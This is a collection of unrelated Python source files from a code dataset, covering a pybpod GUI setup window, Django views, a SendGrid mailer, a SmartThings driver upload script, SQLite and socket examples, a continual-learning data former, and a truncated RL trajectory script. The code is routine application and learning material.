SetupWindow(Setup, BaseWidget):\n \"\"\"\n Define here which fields from the setup model should appear on the details section.\n\n The model fields shall be defined as UI components like text fields, buttons, combo boxes, etc.\n\n You may also assign actions to these components.\n\n **Properties**\n\n name\n :class:`string`\n\n Name associated with this setup. Returns the current value stored in the :py:attr:`_name` text field.\n\n board\n :class:`pybpodgui_plugin.models.board.board_dockwindow.BoardDockWindow`\n\n Board associated with this setup. Returns the current value stored in the :py:attr:`_board` combo box.\n\n **Private attributes**\n\n _name\n :class:`pyforms.controls.ControlText`\n\n Text field to edit board name. Editing this field fires the event :meth:`SetupWindow._SetupWindow__name_changed_evt`.\n\n _board\n :class:`pyforms.controls.ControlCombo`\n\n Combo box to select board associated with this setup. Editing this field fires the event :meth:`SetupWindow._SetupWindow__board_changed_evt`.\n\n _run_task_btn\n :class:`pyforms.controls.ControlButton`\n\n Button to run task on board. Pressing the button fires the event :meth:`SetupWindow._SetupWindow__run_task`.\n\n _formset\n Describe window fields organization to PyForms.\n\n **Methods**\n\n \"\"\"\n\n def __init__(self, experiment=None):\n \"\"\"\n\n :param experiment: Experiment this setup belongs to.\n \"\"\"\n BaseWidget.__init__(self, 'Experiment')\n self.layout().setContentsMargins(5, 10, 5, 5)\n\n self._name = ControlText('Setup name')\n self._board = ControlCombo('Board')\n\n self._stoptrial_btn = ControlButton('Skip trial', default=self._stop_trial_evt)\n self._pause_btn = ControlButton('Pause', checkable=True, default=self._pause_evt)\n self._run_task_btn = ControlButton('Run',\n checkable=True,\n default=self._run_task,\n helptext=\"When a task is running, you can stop all remaining trials by pressing this button. <br/> <b>NOTE:</b> This means that you will need to break the cycle yourself in your task code when the run_state_machine method returns False.\")\n self._kill_task_btn = ControlButton('Kill',\n default=self._kill_task,\n style=\"background-color:rgb(255,0,0);font-weight:bold;\",\n helptext=\"<b>NOTE:</b>This will exit the task process abruptly. The code you might have after the trial loop won't execute.\")\n\n self._subjects_list = ControlList('Subjects', remove_function=self.__remove_subject)\n self._add_subject = ControlButton('Add subject')\n self._allsubjects = ControlCombo('Add subject')\n self._task = ControlCombo('Protocol', changed_event=self._task_changed_evt)\n\n self._detached = ControlCheckBox('Detach from GUI')\n\n self._varspanel = ControlEmptyWidget()\n self._btn = ControlButton('Open')\n\n Setup.__init__(self, experiment)\n\n self.reload_setups()\n self.reload_boards()\n self.reload_tasks()\n\n self._formset = [\n '_name',\n '_board',\n '_task',\n '_detached',\n ('_run_task_btn', '_kill_task_btn'),\n ('_stoptrial_btn', '_pause_btn'),\n #' ',\n {\n 'Subjects': [\n # '_allsubjects',\n '',\n '_add_subject',\n '_subjects_list',\n ],\n 'Variables':[\n '_varspanel',\n ],\n }\n ]\n\n self._kill_task_btn.enabled = False\n self._subjects_list.readonly = True\n self._varspanel.value = self.board_task\n self._add_subject.value = self.__add_subject\n self._name.changed_event = self.__name_changed_evt\n self._board.changed_event = self._board_changed_evt\n\n def slot(self):\n self.clear_subjects()\n listedsubjects = self.sswindow.subjectlist()\n for subj in listedsubjects:\n if subj[1] is True:\n self += subj[0]\n self.sswindow.closewidnow()\n\n def reload_tasks(self, current_selected_task=None):\n # type: (current_selected_task) -> None\n \"\"\"\n Reload tasks now\n\n :param current_selected_task: current selected task\n :type current_selected_task: pybpodgui_plugin.models.task.Task\n \"\"\"\n self._task.clear()\n self._task.add_item('', 0)\n for task in self.project.tasks:\n self._task.add_item(task.name, task)\n self._task.current_index = 0\n if current_selected_task:\n self.task = current_selected_task\n\n def _task_changed_evt(self):\n if hasattr(self, '_update_task'):\n return\n self.task = self._task.value\n\n def __add__(self, obj):\n res = super(SetupWindow, self).__add__(obj)\n if isinstance(obj, Subject):\n self._subjects_list.value = [[s.name] for s in self.subjects]\n return res\n\n def __sub__(self, obj):\n res = super(SetupWindow, self).__sub__(obj)\n if isinstance(obj, Subject):\n self._subjects_list.value = [[s.name] for s in self.subjects]\n return res\n\n def __open_subject_select(self):\n self.sswindow = SubjectSelectPopup(self.project.subjects, self._subjects_list)\n self.sswindow._ok_btn.value = self.slot\n self.sswindow.show()\n\n def __add_subject(self):\n self.__open_subject_select()\n\n def __remove_subject(self):\n if self._subjects_list.selected_row_index is not None:\n name = self._subjects_list.value[self._subjects_list.selected_row_index][0]\n subject = self.project.find_subject(name)\n self -= subject\n self._subjects_list -= -1\n\n def _stop_trial_evt(self):\n self.stop_trial()\n\n def _pause_evt(self):\n if self._pause_btn.checked:\n self.pause_trial()\n else:\n self.resume_trial()\n\n def can_run_task(self):\n try:\n return super().can_run_task()\n except Exception as err:\n self.alert(str(err), \"Unexpected Error\")\n self._run_task_btn.checked = False\n return False\n\n def _run_task(self):\n \"\"\"\n Defines behavior of the button :attr:`SetupWindow._run_task_btn`.\n\n This methods is called every time the user presses the button.\n \"\"\"\n try:\n if self.status == SetupWindow.STATUS_RUNNING_TASK:\n self.stop_task()\n elif self.status == SetupWindow.STATUS_READY:\n self.run_task()\n except RunSetupError as err:\n self.warning(str(err), \"Warning\")\n except Exception as err:\n self.alert(str(err), \"Unexpected Error\")\n\n def _kill_task(self):\n \"\"\"\n Kills a running task. This will stop the current trial and exit the task abruptly within the trial loop (if any).\n \"\"\"\n if self.status == SetupWindow.STATUS_RUNNING_TASK:\n self.kill_task()\n\n def _board_changed_evt(self):\n \"\"\"\n React to changes on text field :py:attr:`_board`.\n\n This method is called every time the user changes the field and forces a UI refresh.\n \"\"\"\n if hasattr(self, '_update_board'):\n return\n self.board = self._board.value\n self.update_ui()\n\n def __name_changed_evt(self):\n \"\"\"\n React to changes on text field :py:attr:`_name`.\n\n This methods is called every time the user changes the field.\n \"\"\"\n if not hasattr(self, '_update_name') or not self._update_name:\n self.name = self._name.value\n self.reload_setups()\n\n def reload_setups(self):\n for subject in self.project.subjects:\n subject.reload_setups()\n\n def reload_boards(self, current_selected_board=None):\n \"\"\"\n Reload boards list on combo box\n\n This method is fired by:\n * setup creation: :py:meth:`pybpodgui_plugin.models.setup.setup_window.SetupWindow._SetupWindow__init__`.\n * setup details section focus (dockwindow): :py:meth:`pybpodgui_plugin.models.setup.setup_dockwindow.SetupDockWindow.show`.\n\n :param current_selected_board: optional specify current selected board to restore after list update\n \"\"\"\n self._board.clear()\n self._board.add_item('', 0)\n for board in self.project.boards:\n self._board.add_item(board.name, board)\n self._board.current_index = 0\n\n if current_selected_board:\n self.board = current_selected_board\n\n self._allsubjects.clear()\n self._allsubjects.add_item('', 0)\n for subject in sorted([s for s in self.project.subjects], key=lambda x: x.name.lower()):\n self._allsubjects.add_item(subject.name, subject)\n self._allsubjects.current_index = 0\n\n self._subjects_list.value = [[s.name] for s in self.subjects]\n\n def create_board_task(self):\n \"\"\"\n Creates a new board task by calling the API.\n\n .. seealso::\n :py:class:`pybpodgui_api.models.setup.board_task.BoardTask`.\n \"\"\"\n return BoardTask(self)\n\n def create_session(self):\n \"\"\"\n Creates a new session by calling the API.\n\n .. seealso::\n :py:class:`pybpodgui_api.models.session.session_base.SessionBase`.\n \"\"\"\n return Session(self)\n\n @property\n def name(self):\n return self._name.value\n\n @name.setter\n def name(self, value):\n self._update_name = True # Flag to avoid recurse calls when editing the name text field\n self._name.value = value\n self._update_name = False\n # Update the session windows names\n if hasattr(self, 'sessions'):\n for session in self.sessions:\n session.name = session.name\n\n @property\n def board(self):\n if isinstance(self._board.value, str) or isinstance(self._board.value, int): return None\n return self._board.value\n\n @board.setter\n def board(self, value):\n if isinstance(value, str):\n value = self.project.find_board(value)\n self._update_board = True # Flag to avoid recurse calls when editing the name text field\n\n if value not in self._board.values:\n self.reload_boards()\n self._board.value = value\n del self._update_board\n Setup.board.fset(self, value)\n\n @property\n def task(self):\n if isinstance(self._task.value, str) or isinstance(self._task.value, int):\n return None\n return self._task.value\n\n @task.setter\n def task(self, value):\n if isinstance(value, str):\n value = self.project.find_task(value)\n\n self._update_task = True # Flag to avoid recurse calls when editing the name text field\n\n if value not in self._task.values:\n self.reload_tasks()\n\n self._task.value = value\n del self._update_task\n Setup.task.fset(self, value)\n\n @property\n def detached(self): return self._detached.value\n @detached.setter\n def detached(self, value): self._detached.value = value\n\n\n# Execute the application\nif __name__ == \"__main__\":\n app.start_app(SetupWindow)\n","sub_path":"pybpodgui_plugin/models/setup/setup_window.py","file_name":"setup_window.py","file_ext":"py","file_size_in_byte":13638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"564050742","text":"from collections import defaultdict\r\n\r\n\r\nclass Blog:\r\n\r\n def __init__(self, title, posts=None):\r\n self.title = title\r\n self.entries = posts if posts is not None else []\r\n\r\n def append(self, post):\r\n self.entries.append(post)\r\n\r\n def by_tag(self):\r\n tag_index = defaultdict(list)\r\n for post in self.entries:\r\n for tag in post.tags:\r\n tag_index[tag].append(post.as_dict())\r\n return tag_index\r\n\r\n def as_dict(self):\r\n return dict(\r\n title=self.title,\r\n underline=\"=\" * len(self.title),\r\n entries=[p.as_dict() for p in self.entries])\r\nif __name__ == \"__main__\":\r\n from chapter9.post import Post\r\n import datetime\r\n import json\r\n travel_x = Blog(\"Travel\")\r\n travel_x.append(\r\n Post(date=datetime.datetime(2013, 11, 14, 17, 25),\r\n title=\"Hard Aground\",\r\n rst_text=\"\"\"Some embarrassing revelation. Including ☹ and ⚓\"\"\",\r\n tags=(\"#RedRanger\", \"#Whitby42\", \"#ICW\"),\r\n )\r\n )\r\n travel_x.append(\r\n Post(date=datetime.datetime(2013, 11, 18, 15, 30),\r\n title=\"Anchor Follies\",\r\n rst_text=\"\"\"Some witty epigram. Including < & > characters.\"\"\",\r\n tags=(\"#RedRanger\", \"#Whitby42\", \"#Mistakes\"),\r\n )\r\n )\r\n print(travel_x.by_tag())\r\n print(\"Less elegant\")\r\n print(json.dumps(travel_x.as_dict(), indent=4))\r\n","sub_path":"chapter9/blog.py","file_name":"blog.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"625002541","text":"from django.views.generic import ListView, DetailView, CreateView\nfrom .models import Gamecode, Platform, Slider\n\nclass GamecodeListing(ListView):\n model = Gamecode\n \nclass GamecodeDetail(DetailView):\n model = Gamecode\n\nclass PlatformListing(ListView):\n model = Platform\n\n \nclass PlatformDetail(DetailView):\n model = Platform\n \n\nclass GamecodeView(CreateView):\n\tmodel = Gamecode\n\tsuccess_url = '/sent'\n\nclass Slider(ListView):\n\tmodel = Slider\n\n\n","sub_path":"gamecheap/apps/sell/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"255704731","text":"import os\nfrom sendgrid import SendGridAPIClient\nfrom sendgrid.helpers.mail import Mail, From, To, Subject, PlainTextContent, HtmlContent\nimport config\n\nclass Mailer:\n def __init__(self):\n self.__sg = SendGridAPIClient(config.send_grid_api_key)\n\n def send_email_base(self, from_email, to_emails, subject, html_content):\n message = Mail(from_email=From(from_email),\n to_emails=[To(to_email) for to_email in to_emails],\n subject=Subject(subject),\n html_content=HtmlContent(html_content))\n return self.__sg.send(message)\n\n def send_email_to_me(self, subject, html_content):\n return self.send_email_base(\n from_email='nanazhoushop@gmail.com',\n to_emails=['nanazhouh@gmail.com'],\n subject=subject,\n html_content=html_content) \n\n def send_email(self, product, action, timestamp):\n time = '{} PT'.format(timestamp.strftime(\"%Y-%m-%d, %H:%M:%S\"))\n pattern = product['pattern']\n color = product['color']\n url = product['url']\n has_image = False\n if len(product['images']) > 0:\n has_image = True\n image = product['images'][0]\n\n subject = 'Hermes US {} {} - {} at {}'.format(action, pattern, color, time)\n if has_image:\n html_content = '''\n <div>\n <a href='{}' style='font-size:14px; font-weight:bold; color:black; text-decoration: none;'>\n {} - {}\n </a>\n </div>\n <br/>\n <div>\n <a href='{}'><img src='{}' /></a>\n </div>\n '''.format(url, pattern, color, url, image)\n else:\n html_content = '''\n <div>\n <a href='{}' style='font-size:14px; font-weight:bold; color:black; text-decoration: none;'>\n {} - {}\n </a>\n </div>\n '''.format(url, pattern, color)\n\n self.send_email_to_me(subject=subject, html_content=html_content)\n","sub_path":"mailer.py","file_name":"mailer.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"452715472","text":"import caffe\nimport matplotlib.pyplot as plt\nimport time as timelib\nimport pdb\n\ncaffe.set_mode_gpu()\ncaffe.set_device(1)\n\nsolver = caffe.get_solver('/media/ys/1a32a0d7-4d1f-494a-8527-68bb8427297f/End_to_End/caffe/solver.prototxt')\n#solver.net.copy_from('/media/ys/1a32a0d7-4d1f-494a-8527-68bb8427297f/End_to_End/caffe/weight/nvidia/nvidia_00001_iter_5000.caffemodel')\n#solver.net.copy_from('/media/ys/1a32a0d7-4d1f-494a-8527-68bb8427297f/Data/train/checkpoint-sdc-ch2.data-00000-of-00001.caffemodel')\nmax_iter = 800000\nfig, axes = plt.subplots()\nfig.show()\nloss = 0\nloss_list = []\niter0 = solver.iter\nepoch = 0\n\nwhile solver.iter < max_iter:\n\n# net_full_conv.save('./copy_vgg.caffemodel')\n solver.step(1)\n #if solver.iter == 3000:\n #\tpdb.set_trace()\n# if solver.iter % 100 == 0:\n# \tpdb.set_trace()\n #pdb.set_trace()\n #if solver.iter % 500 ==0:\n label = solver.net.blobs['label'].data \n out = solver.net.blobs['fc10'].data\n #pdb.set_trace()\n loss = solver.net.blobs['loss'].data.flatten()\n if loss > 30:\n \tloss = 30\n loss_list.append(loss) \n if solver.iter % 100 == 0:\n axes.clear()\n axes.plot(range(iter0, iter0+len(loss_list)), loss_list)\n# axes.grid(True)\n fig.canvas.draw()\n plt.pause(0.01)\n\nfig.savefig('fig_iter_%d.png' % solver.iter)","sub_path":"caffe_code/nvidia/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"588896990","text":"import os.path\nimport torch\nfrom copy import deepcopy\n\nif os.path.exists(\"Sequence_Formers\"): # check if we are in the folder Continual_Learning_Data_Former\n from data_utils import load_data, check_and_Download_data\nelse:\n from ..data_utils import load_data, check_and_Download_data\n\n'''\nParent Class for Sequence Formers \n'''\n\nclass Sequence_Former(object):\n def __init__(self, args):\n super(Sequence_Former, self).__init__()\n\n self.n_tasks = args.n_tasks\n self.num_classes = args.num_classes\n self.i = args.i\n self.o = args.o\n self.imageSize = args.imageSize\n self.img_channels = args.img_channels\n self.dataset = args.dataset\n self.path_only = args.path_only # only valid for core50 at the moment\n self.task = args.task\n\n # if self.path_only we don't load data but just path\n # data will be loaded online while learning\n # it is considered as light mode this continual dataset are easy to generate and load\n if self.path_only:\n light_id='_light'\n else:\n light_id=''\n\n if not os.path.exists(args.o):\n os.makedirs(args.o)\n\n self.o_train = os.path.join(self.o, '{}_{}_train{}.pt'.format(self.task, self.n_tasks, light_id))\n self.o_valid = os.path.join(self.o, '{}_{}_valid{}.pt'.format(self.task, self.n_tasks, light_id))\n self.o_test = os.path.join(self.o, '{}_{}_test{}.pt'.format(self.task, self.n_tasks, light_id))\n\n\n self.o_train_full = os.path.join(self.o, '{}_1-{}_train{}.pt'.format(self.task, self.n_tasks,light_id))\n self.o_valid_full = os.path.join(self.o, '{}_1-{}_valid{}.pt'.format(self.task, self.n_tasks,light_id))\n self.o_test_full = os.path.join(self.o, '{}_1-{}_test{}.pt'.format(self.task, self.n_tasks,light_id))\n\n check_and_Download_data(self.i, self.dataset, task=self.task)\n\n def select_index(self, ind_task, y):\n \"\"\"\n This function help to select data in particular if needed\n :param ind_task: task index in the sequence\n :param y: data label\n :return: class min, class max, and index of data to keep\n \"\"\"\n return 0, self.num_classes - 1, torch.arange(len(y))\n\n def transformation(self, ind_task, data):\n \"\"\"\n Apply transformation to data if needed\n :param ind_task: task index in the sequence\n :param data: data to process\n :return: data post processing\n \"\"\"\n if not ind_task < self.num_classes:\n raise AssertionError(\"Error in task indice\")\n return deepcopy(data)\n\n def label_transformation(self, ind_task, label):\n \"\"\"\n Apply transformation to label if needed\n :param ind_task: task index in the sequence\n :param label: label to process\n :return: data post processing\n \"\"\"\n if not ind_task < self.num_classes:\n raise AssertionError(\"Error in task indice\")\n return label\n\n @staticmethod\n def get_valid_ind(i_tr):\n # it is time to taxe train for validation\n len_valid = int(len(i_tr) * 0.2)\n indices = torch.randperm(len(i_tr))\n\n valid_ind = indices[:len_valid]\n train_ind = indices[len_valid:]\n\n i_va = i_tr[valid_ind]\n i_tr = i_tr[train_ind]\n\n return i_tr, i_va\n\n\n def create_task(self, ind_task, x_tr, y_tr, x_te, y_te):\n\n # select only the good classes\n class_min, class_max, i_tr = self.select_index(ind_task, y_tr)\n _, _, i_te = self.select_index(ind_task, y_te)\n\n i_tr, i_va = self.get_valid_ind(i_tr)\n\n x_tr_t = self.transformation(ind_task, x_tr[i_tr])\n x_va_t = self.transformation(ind_task, x_tr[i_va])\n x_te_t = self.transformation(ind_task, x_te[i_te])\n\n y_tr_t = self.label_transformation(ind_task, y_tr[i_tr])\n y_va_t = self.label_transformation(ind_task, y_tr[i_va])\n y_te_t = self.label_transformation(ind_task, y_te[i_te])\n\n return class_min, class_max, x_tr_t, y_tr_t, x_va_t, y_va_t, x_te_t, y_te_t\n\n\n def formating_data(self):\n\n # variable to save the sequence\n tasks_tr = []\n tasks_va = []\n tasks_te = []\n\n\n # variable to save the cumul of the sequence for upperbound\n tasks_tr_full = []\n tasks_va_full = []\n tasks_te_full = []\n full_x_tr, full_y_tr = None, None\n full_x_va, full_y_va = None, None\n full_x_te, full_y_te = None, None\n\n x_tr, y_tr, x_te, y_te = load_data(self.dataset, self.i, self.imageSize, self.path_only)\n\n for ind_task in range(self.n_tasks):\n\n c1, c2, x_tr_t, y_tr_t, x_va_t, y_va_t, x_te_t, y_te_t = self.create_task(ind_task, x_tr, y_tr, x_te, y_te)\n\n tasks_tr.append([(c1, c2), x_tr_t, y_tr_t])\n tasks_va.append([(c1, c2), x_va_t, y_va_t])\n tasks_te.append([(c1, c2), x_te_t, y_te_t])\n\n if ind_task == 0:\n full_x_tr = x_tr_t\n full_x_va = x_va_t\n full_x_te = x_te_t\n full_y_tr = y_tr_t\n full_y_va = y_va_t\n full_y_te = y_te_t\n else:\n full_x_tr = torch.cat([full_x_tr, x_tr_t], dim=0)\n full_x_va = torch.cat([full_x_va, x_va_t], dim=0)\n full_x_te = torch.cat([full_x_te, x_te_t], dim=0)\n full_y_tr = torch.cat([full_y_tr, y_tr_t], dim=0)\n full_y_va = torch.cat([full_y_va, y_va_t], dim=0)\n full_y_te = torch.cat([full_y_te, y_te_t], dim=0)\n\n\n if not self.path_only:\n print(tasks_tr[0][1].shape)\n print(tasks_tr[0][1].mean())\n print(tasks_tr[0][1].std())\n\n torch.save(tasks_tr, self.o_train)\n torch.save(tasks_va, self.o_valid)\n torch.save(tasks_te, self.o_test)\n\n\n tasks_tr_full.append([(0, self.num_classes), full_x_tr, full_y_tr])\n tasks_va_full.append([(0, self.num_classes), full_x_va, full_y_va])\n tasks_te_full.append([(0, self.num_classes), full_x_te, full_y_te])\n\n torch.save(tasks_tr_full, self.o_train_full)\n torch.save(tasks_va_full, self.o_valid_full)\n torch.save(tasks_te_full, self.o_test_full)\n","sub_path":"Sequence_Formers/sequence_former.py","file_name":"sequence_former.py","file_ext":"py","file_size_in_byte":6263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"377662416","text":"#!/usr/bin/python\n#-*- coding: utf-8 -*-\n\n# __author__ = '330mlcc'\n#\n# import socket\n# import time\n# import threading\n#\n# def tcplink(sock,addr):\n# print('accetp new connection for %s:5S...' % addr)\n# sock.send('welcome!'.encode())\n# while True:\n# data = socket.recv(1024)\n# time.sleep(5)\n#\n# if data == 'exit' or not data:\n# break\n#\n# sock.send('hello : '.encode()+data)\n#\n# socket.close()\n# print('Connection from %s:%s' % addr)\n#\n# s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n#\n# s.bind(('127.0.0.1',9001))\n#\n# s.listen(5)\n#\n# print('waiting for connection....')\n#\n# while True:\n# sock,addr = s.accept()\n# t = threading.Thread(target=tcplink(),args=(socket,addr))\n# t.start()\n\nimport socket\nimport time\n\nhost = '' #host设定为空,表示可以与任何ip的socket在端口9001通信\nport = 9001\nbufsize = 1024\n\nquit = False\nshutdown = False\n\naddr = (host,port)\n\n##设置socket,AF_INET表示是IPV4标准,SOCK_STREAM是TCP传输协议\ntcpConnServers = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ntcpConnServers.bind(addr)\ntcpConnServers.listen(1)\n\nwhile True: #与客户端建立连接之后,获取客户端传来的数据\n print('watting for connection...')\n tcpConnClients,ddr = tcpConnServers.accept() # 不断监听获取新的客户端连接\n print('connected from : ', addr)\n\n while True:\n data = tcpConnClients.recv(bufsize)\n data = data.decode('utf-8')\n\n if not data:\n break\n\n ss = '[%s] %s' % (time.time(),data)\n print(ss)\n\n if data == 'bye':\n quit = True\n break\n elif data == 'shutdown':\n shutdown = True\n break\n print('server has been closed')\n\nif __name__ == '__main__':\n pass\n\n","sub_path":"src/reading/network/charpt1/fromExaSocketServer.py","file_name":"fromExaSocketServer.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"383195201","text":"import os, subprocess, requests, json, time, yaml, hashlib\n\nENVIRONMENT_URL = os.environ.get('ENVIRONMENT_URL')\nUPLOAD_URL = ENVIRONMENT_URL+\"/drivers/package\"\nCHANNEL_ID = os.environ.get('CHANNEL_ID')\nUPDATE_URL = ENVIRONMENT_URL+\"/channels/\"+CHANNEL_ID+\"/drivers/bulk\"\nTOKEN = os.environ.get('TOKEN')\nDRIVERID = \"driverId\"\nVERSION = \"version\"\nARCHIVEHASH = \"archiveHash\"\n\n# Make sure we're running in the root of the git directory\na = subprocess.run([\"git\", \"rev-parse\", \"--show-toplevel\"], capture_output=True)\nos.chdir(a.stdout.decode().strip()+\"/drivers/SmartThings/\")\n\n# Get list of all SmartThings driver folders\ndrivers = [driver.name for driver in os.scandir('.') if driver.is_dir()]\ndriver_updates = []\ndrivers_updated = []\nuploaded_drivers = {}\n\n# Get drivers currently on the channel\nresponse = requests.get(\n ENVIRONMENT_URL+\"/drivers\",\n headers={\n \"Accept\": \"application/vnd.smartthings+json;v=20200810\",\n \"Authorization\": \"Bearer \"+TOKEN\n }\n)\nif response.status_code != 200:\n print(\"Failed to retrieve channel's current drivers\")\n print(\"Error code: \"+str(response.status_code))\n print(\"Error response: \"+response.text)\nelse:\n response_json = json.loads(response.text)[\"items\"]\n for driver in response_json:\n if ARCHIVEHASH in driver.keys() and VERSION in driver.keys() and DRIVERID in driver.keys():\n uploaded_drivers[driver[\"packageKey\"]] = {DRIVERID: driver[DRIVERID], VERSION: driver[VERSION], ARCHIVEHASH: driver[ARCHIVEHASH]}\n\n# For each driver, first package the driver locally, then upload it\n# after it's been uploaded, hold on to the driver id and version\nfor driver in drivers:\n subprocess.run([\"rm\", \"edge.zip\"], capture_output=True)\n package_key = \"\"\n with open(driver+\"/config.yml\", 'r') as config_file:\n package_key = yaml.safe_load(config_file)[\"packageKey\"]\n print(package_key)\n subprocess.run([\"zip -r ../edge.zip $(find . -name \\\"*.yml\\\" -o -name \\\"*.lua\\\" -o -name \\\"*.yaml\\\") -X -x \\\"*test*\\\"\"], cwd=driver, shell=True, capture_output=True)\n with open(\"edge.zip\", 'rb') as driver_package:\n data = driver_package.read()\n # TODO: This does not yet work, hash returned by server does not match\n hash = hashlib.sha256(data).hexdigest()\n response = None\n retries = 0\n if package_key not in uploaded_drivers.keys() or hash != uploaded_drivers[package_key][\"archiveHash\"]: \n while response == None or (response.status_code == 500 or response.status_code == 429):\n response = requests.post(\n UPLOAD_URL, \n headers={\n \"Content-Type\": \"application/zip\", \n \"Accept\": \"application/vnd.smartthings+json;v=20200810\",\n \"Authorization\": \"Bearer \"+TOKEN,\n \"X-ST-LOG-LEVEL\": \"TRACE\"},\n data=data)\n if response.status_code != 200:\n print(\"Failed to upload driver \"+driver)\n print(\"Error code: \"+str(response.status_code))\n print(\"Error response: \"+response.text)\n if response.status_code == 500 or response.status_code == 429:\n retries = retries + 1\n if retries > 3:\n break # give up\n if response.status_code == 429:\n time.sleep(10)\n else:\n print(\"Uploaded package successfully: \"+driver)\n drivers_updated.append(driver)\n response_json = json.loads(response.text)\n driver_updates.append({DRIVERID: response_json[DRIVERID], VERSION: response_json[VERSION]})\n time.sleep(5)\n else:\n print(\"Hash matched existing driver for \"+package_key)\n # hash matched, use the currently uploaded version of the driver to \"update\" the channel\n driver_updates.append({DRIVERID: uploaded_drivers[package_key][DRIVERID], VERSION: uploaded_drivers[package_key][VERSION]}) \n\nresponse = requests.put(\n UPDATE_URL,\n headers={\n \"Accept\": \"application/vnd.smartthings+json;v=20200810\",\n \"Authorization\": \"Bearer \"+TOKEN,\n \"Content-Type\": \"application/json\",\n \"X-ST-LOG-LEVEL\": \"TRACE\"\n },\n data=json.dumps(driver_updates)\n)\nif response.status_code != 204:\n print(\"Failed to bulk update drivers\")\n print(\"Error code: \"+str(response.status_code))\n print(\"Error response: \"+response.text)\n exit(1)\n\nprint(\"Successfully bulk-updated channel: \")\nprint(drivers_updated)","sub_path":"tools/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":4290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"308290330","text":"import os\nimport sys\nimport sqlite3\n\n# Existenz feststellen\nif os.path.exists(\"firma_SQLite_10.db\"):\n print(\"Datei bereits vorhanden\")\n sys.exit(0)\n\n# Verbindung zur Datenbank erzeugen\nconnection = sqlite3.connect(\"firma_SQLite_10.db\")\n\n# Datensatz-Cursor erzeugen\ncursor = connection.cursor()\n\n# Tabelle erzeugen\nsql = \"CREATE TABLE personen(\" \\\n \"name TEXT, \" \\\n \"vorname TEXT, \" \\\n \"personalnummer INTEGER PRIMARY KEY, \" \\\n \"gehalt REAL, \" \\\n \"waehrung TEXT, \" \\\n \"geburtstag TEXT)\"\ncursor.execute(sql)\n\n# Datensatz erzeugen\nsql = \"INSERT INTO personen VALUES('Maier', \" \\\n \"'Hans', 6714, 3500.00,'€', '15.03.1962')\"\ncursor.execute(sql)\nconnection.commit()\n\n# Datensatz erzeuegen\nsql = \"INSERT INTO personen VALUES('Schmitz', \" \\\n \"'Peter', 81343, 3750.00,'€', '12.04.1958')\"\ncursor.execute(sql)\nconnection.commit()\n\n# Datensatz erzeuegen\nsql = \"INSERT INTO personen VALUES('Mertens', \" \\\n \"'Julia', 2297, 3621.50,'€', '30.12.1959')\"\ncursor.execute(sql)\nconnection.commit()\n\n# Verbindung beenden\nconnection.close()\n","sub_path":"exercise/sqlite_erzeugen_10_1.py","file_name":"sqlite_erzeugen_10_1.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"574196997","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: Jiyuan Zhou\n\nEnable an agent to follow a hard coded trajectory in the form of\na square with rounded corners using trained straight and circle models.\n\"\"\"\nimport argparse\nimport cProfile\nimport pstats\nimport sys\nimport time\nimport math\nimport yaml\n\nimport joblib\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom rllab.misc import tensor_utils\n\nfrom aa_simulation.envs.renderer import _Renderer\n\n\ndef render(renderer, state, action):\n \"\"\"\n Render simulation environment.\n \"\"\"\n renderer.update(state, action)\n\n\ndef modify_state_curve(state, move_param):\n \"\"\"\n Convert state [x, y, yaw, x_dot, y_dot, yaw_dot] to\n [dx, theta, ddx, dtheta]\n \"\"\"\n x_0, y_0, r = move_param\n x, y, yaw, x_dot, y_dot, yaw_dot = state\n\n x -= x_0\n y -= y_0\n\n dx = np.sqrt(np.square(x) + np.square(y)) - r\n theta = _normalize_angle(np.arctan2(-x, y) + np.pi - yaw)\n ddx = x/(x**2 + y**2)**0.5*x_dot + y/(x**2 + y**2)**0.5*y_dot\n dtheta = x/(x**2 + y**2)*x_dot - y/(x**2 + y**2)*y_dot - yaw_dot\n\n return np.array([dx, theta, ddx, dtheta])\n\n\ndef _normalize_angle(angle):\n \"\"\"\n Normalize angle to [-pi, pi).\n \"\"\"\n angle = angle % (2*np.pi)\n if (angle >= np.pi):\n angle -= 2*np.pi\n return angle\n\n\ndef _normalize_angle2(angle):\n \"\"\"\n Normalize angle to [0, 2 * pi).\n \"\"\"\n angle = angle % (2*np.pi)\n return angle\n\n\ndef modify_state_straight(state, move_param):\n \"\"\"\n Add target direction and target velocity to state, to feed\n in the NN.\n \"\"\"\n x_0, y_0, target_dir = move_param\n x, y, yaw, x_dot, y_dot, dyaw = state\n target_dir = _normalize_angle2(target_dir)\n\n new_x, new_y = _cal_distance(x, y, move_param)\n yaw = _normalize_angle2(yaw) - target_dir\n yaw = _normalize_angle(yaw)\n\n new_x_dot = x_dot * np.cos(target_dir) + y_dot * np.sin(target_dir)\n new_y_dot = y_dot * np.cos(target_dir) - x_dot * np.sin(target_dir)\n\n return np.array([new_y, yaw, new_x_dot, new_y_dot, dyaw])\n\n\ndef _cal_distance(x, y, move_param):\n # For arbitrary trajectory.\n init_x, init_y, target_dir = move_param\n\n # if _normalize_angle(target_dir) == math.pi / 2:\n # next_x, next_y = init_x, init_y + 1\n # print(1)\n # return(0, - x + init_x)\n # elif _normalize_angle(target_dir) == -math.pi / 2:\n # next_x, next_y = 